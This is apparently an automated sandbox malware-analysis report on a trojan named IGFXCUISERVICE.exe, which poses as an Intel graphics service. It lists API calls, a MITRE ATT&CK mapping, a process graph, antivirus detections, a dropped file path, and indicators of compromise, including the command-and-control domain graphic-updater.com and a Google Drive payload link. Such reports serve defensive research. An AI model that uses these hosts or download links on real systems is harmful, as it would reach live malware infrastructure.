Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: EnumSystemLocalesW,
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: EnumSystemLocalesW,
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: EnumSystemLocalesW,
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: EnumSystemLocalesW,
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: EnumSystemLocalesW,
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: GetLocaleInfoW,
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: GetLocaleInfoW,
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: GetLocaleInfoW,
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012C48C6 cpuid
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_080942C4 CreateNamedPipeW,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012C529D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation2Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information11Input Capture1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsCommand and Scripting Interpreter112Registry Run Keys / Startup Folder1Process Injection13Obfuscated Files or Information2LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsPowerShell2Logon Script (Windows)Registry Run Keys / Startup Folder1Masquerading1Security Account ManagerSystem Information Discovery32SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Modify Registry1NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion121LSA SecretsSecurity Software Discovery221SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection13Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncVirtualization/Sandbox Evasion121Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 550959 Sample: IGFXCUISERVICE Startdate: 11/01/2022 Architecture: WINDOWS Score: 92 100 Antivirus / Scanner detection for submitted sample 2->100 102 Multi AV Scanner detection for submitted file 2->102 9 IGFXCUISERVICE.exe 5 2->9         started        11 igfxCUIService.exe 2->11         started        14 igfxCUIService.exe 2->14         started        process3 dnsIp4 16 igfxCUIService.exe 3 9->16         started        20 powershell.exe 15 9->20         started        78 192.168.2.1 unknown unknown 11->78 80 graphic-updater.com 11->80 86 3 other IPs or domains 11->86 23 cmd.exe 11->23         started        82 graphic-updater.com 14->82 84 googlehosted.l.googleusercontent.com 14->84 88 2 other IPs or domains 14->88 25 cmd.exe 14->25         started        process5 dnsIp6 72 graphic-updater.com 23.254.131.176, 443, 49795, 49796 HOSTWINDSUS United States 16->72 74 drive.google.com 142.250.181.238, 443, 49792, 49811 GOOGLEUS United States 16->74 76 2 other IPs or domains 16->76 90 Antivirus detection for dropped file 16->90 92 Multi AV Scanner detection for dropped file 16->92 94 Encrypted powershell cmdline option found 16->94 27 powershell.exe 19 16->27         started        29 cmd.exe 16->29         started        32 cmd.exe 16->32         started        40 2 other processes 16->40 66 C:\ProgramData\...\igfxCUIService.exe, PE32 20->66 dropped 68 C:\...\igfxCUIService.exe:Zone.Identifier, ASCII 20->68 dropped 96 Powershell drops PE file 20->96 34 conhost.exe 20->34         started        98 Uses cmd line tools excessively to alter registry or file data 23->98 36 conhost.exe 23->36         started        38 reg.exe 23->38         started        file7 signatures8 process9 file10 43 getmac.exe 1 27->43         started        46 WMIC.exe 1 27->46         started        48 conhost.exe 27->48         started        108 Uses cmd line tools excessively to alter registry or file data 29->108 50 conhost.exe 29->50         started        52 WMIC.exe 29->52         started        60 2 other processes 32->60 70 C:\ProgramData\SystemData\tempu.txt, ASCII 40->70 dropped 54 conhost.exe 40->54         started        56 conhost.exe 40->56         started        58 WMIC.exe 40->58         started        signatures11 process12 signatures13 104 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 43->104 106 Writes or reads registry keys via WMI 43->106 62 conhost.exe 48->62         started        64 reg.exe 48->64         started        process14

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
IGFXCUISERVICE.exe51%VirustotalBrowse
IGFXCUISERVICE.exe20%MetadefenderBrowse
IGFXCUISERVICE.exe42%ReversingLabsWin32.Trojan.Fileless
IGFXCUISERVICE.exe100%AviraTR/Redcap.rjsiq

Dropped Files

SourceDetectionScannerLabelLink
C:\ProgramData\SystemData\igfxCUIService.exe100%AviraTR/Redcap.rjsiq
C:\ProgramData\SystemData\igfxCUIService.exe20%MetadefenderBrowse
C:\ProgramData\SystemData\igfxCUIService.exe42%ReversingLabsWin32.Trojan.Fileless

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
graphic-updater.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://graphic-updater.com/api/attach0%Avira URL Cloudsafe
https://graphic-updater.com0%VirustotalBrowse
https://graphic-updater.com0%Avira URL Cloudsafe
https://graphic-updater.com/api/reqb0%Avira URL Cloudsafe
https://graphic-updater.com/api/reqd0%Avira URL Cloudsafe
https://graphic-updater.com/m60%Avira URL Cloudsafe
https://graphic-updater.com/api/reqj0%Avira URL Cloudsafe
https://graphic-updater.com/api/reqm0%Avira URL Cloudsafe
https://graphic-updater.comB0%Avira URL Cloudsafe
https://graphic-updater.com/50%Avira URL Cloudsafe
https://graphic-updater.com/api/reqo0%Avira URL Cloudsafe
https://contoso.com/License0%URL Reputationsafe
https://graphic-updater.com/e60%Avira URL Cloudsafe
https://graphic-updater.com/api/requ0%Avira URL Cloudsafe
https://graphic-updater.com/api/requrlencodedW%0%Avira URL Cloudsafe
https://graphic-updater.com/om0%Avira URL Cloudsafe
https://graphic-updater.com/api/requrlencoded0%Avira URL Cloudsafe
https://graphic-updater.com/api/attachM&dQ%0%Avira URL Cloudsafe
https://graphic-updater.com/api/reqs%qPG0%Avira URL Cloudsafe
https://graphic-updater.com/comD0%Avira URL Cloudsafe
https://graphic-updater.com/0%Avira URL Cloudsafe
https://graphic-updater.com/api/reqmj0%Avira URL Cloudsafe
https://graphic-updater.com/api/requrlencodedz%hPF0%Avira URL Cloudsafe
https://graphic-updater.com/C0%Avira URL Cloudsafe
https://graphic-updater.com/om60%Avira URL Cloudsafe
https://graphic-updater.com/api/reqmv10%Avira URL Cloudsafe
http://crl.microsoft.co0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://graphic-updater.com/api/attachn50%Avira URL Cloudsafe
https://graphic-updater.com/api/reqch0%Avira URL Cloudsafe
https://graphic-updater.com/ll0%Avira URL Cloudsafe
http://crl.micr0%URL Reputationsafe
https://graphic-updater.com/omX0%Avira URL Cloudsafe
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://graphic-updater.com/u0%Avira URL Cloudsafe
https://contoso.com/Icon0%URL Reputationsafe
https://graphic-updater.com/api/req20%Avira URL Cloudsafe
https://graphic-updater.com/api/req70%Avira URL Cloudsafe
https://graphic-updater.com/api/attacht.com0%Avira URL Cloudsafe
https://graphic-updater.com/api/req80%Avira URL Cloudsafe
https://graphic-updater.comcomV0%Avira URL Cloudsafe
https://csp.withgoogle.com/csp/report-to/gse_l9ocg5Eh0%Avira URL Cloudsafe
https://graphic-updater.com/api/attach/0%Avira URL Cloudsafe
https://graphic-updater.com/api/reqC0%Avira URL Cloudsafe
https://graphic-updater.com/api/req0%Avira URL Cloudsafe
https://graphic-updater.com/api/reqm64W%0%Avira URL Cloudsafe
https://graphic-updater.com/api/reqmx0%Avira URL Cloudsafe
https://graphic-updater.com/api/attachtent.com0%Avira URL Cloudsafe
https://graphic-updater.com_0%Avira URL Cloudsafe
https://graphic-updater.com/P0%Avira URL Cloudsafe
https://graphic-updater.com/api/reqdll0%Avira URL Cloudsafe
https://graphic-updater.com/Q0%Avira URL Cloudsafe
https://graphic-updater.com/api/reqT0%Avira URL Cloudsafe
https://graphic-updater.com/X0%Avira URL Cloudsafe
https://graphic-updater.com/api/reqW0%Avira URL Cloudsafe
https://graphic-updater.com/api/reqV0%Avira URL Cloudsafe
https://graphic-updater.com/api/reqX0%Avira URL Cloudsafe
https://graphic-updater.comcom50%Avira URL Cloudsafe
https://graphic-updater.comomH0%Avira URL Cloudsafe
https://graphic-updater.com/api/reqdlli0%Avira URL Cloudsafe
https://graphic-updater.com/api/attachent.com0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
graphic-updater.com
23.254.131.176
truefalseunknown
drive.google.com
142.250.181.238
truefalse
    		high
    googlehosted.l.googleusercontent.com
    		142.250.185.129
    		truefalse
      		high
      doc-0k-2o-docs.googleusercontent.com
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://graphic-updater.com/api/attachfalse
        • Avira URL Cloud: safe
        		unknown
        https://drive.google.com/uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eufalse
          		high
          https://doc-0k-2o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8gdd9p4c62g2sf2iqkmc81t1u/1641917325000/15598710561884722261/*/1W64PQQxrwY3XjBnv_QAeBQu-ePr537eufalse
            		high
            https://graphic-updater.com/api/reqfalse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://graphic-updater.comigfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://graphic-updater.com/api/reqbigfxCUIService.exe, 00000005.00000003.936867052.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.921655046.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://graphic-updater.com/api/reqdigfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://doc-0k-2o-docs.googleusercontent.com/igfxCUIService.exe, 00000005.00000003.878407019.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.909608039.00000000014A2000.00000004.00000001.sdmpfalse
              		high
              https://graphic-updater.com/m6igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://graphic-updater.com/api/reqjigfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://graphic-updater.com/api/reqmigfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://graphic-updater.comBigfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://graphic-updater.com/5igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://graphic-updater.com/api/reqoigfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/Licensepowershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://graphic-updater.com/e6igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://graphic-updater.com/api/requigfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://graphic-updater.com/api/requrlencodedW%igfxCUIService.exe, 00000005.00000003.893294803.000000000122A000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://graphic-updater.com/omigfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://graphic-updater.com/api/requrlencodedigfxCUIService.exe, 00000005.00000003.897518797.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
